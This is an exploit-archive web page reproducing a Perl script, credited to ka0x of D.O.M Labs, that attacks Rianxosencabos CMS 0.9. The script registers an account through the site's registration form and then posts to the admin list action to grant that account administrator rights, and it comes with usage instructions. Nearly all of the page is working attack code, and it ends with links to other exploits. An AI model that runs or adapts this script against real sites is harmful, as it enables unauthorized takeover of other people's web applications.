手机
当前位置:查字典教程网 >网络安全 >Exploit >Rianxosencabos CMS 0.9 Remote Add Admin Exploit
Rianxosencabos CMS 0.9 Remote Add Admin Exploit
摘要:#!/usr/bin/perl-w#RianxosencabosCMS0.9RemoteAddAdminExploit#Download:h...

#!/usr/bin/perl -w # Rianxosencabos CMS 0.9 Remote Add Admin Exploit

# Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz # written by ka0x <ka0x01 [at] gmail [dot] com>

# D.O.M Labs - Security Researchers

# - www.domlabs.org - use LWP::UserAgent; my ($host, $login, $pass, $mail, $user_id) = @ARGV ; unless($ARGV[4]){

print "[*] usage: perl $0 <host> <login> <pass> <mail> <user_id>n";

print "[*] ex: perl $0 http://localhost/ ka0x 12345 ka0x01[at]gmail.com 2n";

exit 1;

} if ($host !~ /^http:/){ $host = 'http://'.$host; } my $ua = LWP::UserAgent->new() or die ;

$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;

$ua->timeout(10) ; sub __CREATE { my $req = HTTP::Request->new(POST => $host."index.php?s=usuarios&accion=registrar") ;

$req->content_type('application/x-www-form-urlencoded') ;

$req->content("reg_login=".$login."&reg_pass=".$pass."&reg_repass=".$pass."&reg_nombre=".$login."&reg_mail=".$mail."&submit_register=Rexistrar") ; my $res = $ua->request($req) ;

my $location = $res->header('Location') ;

if ($location =~ /Usuario creado/i) {

print "[ ] user added: ".$login ;

print "n[ ] password: ".$pass, "n" ;

} else{

print "[-] Exploit Failed!n" ;

}

} &__CREATE ; sub __ADMIN {

my $req = HTTP::Request->new(POST => $host."?s=admin&accion=lista") ; $req->content_type('application/x-www-form-urlencoded') ; $req->content($user_id."=0&inputOculto=".$user_id) ; $ua->request($req) ;

} &__ADMIN ;

__END__

【Rianxosencabos CMS 0.9 Remote Add Admin Exploit】相关文章:

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

LoveCMS 1.6.2 Final Update Settings Remote Exploit

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

TGS CMS 0.3.2r2 Remote Code Execution Exploit

BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution

Joomla Component EZ Store Remote Blind SQL Injection Exploit

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

LoveCMS 1.6.2 Final Remote Code Execution Exploit

上一篇: iGaming CMS
精品推荐
分类导航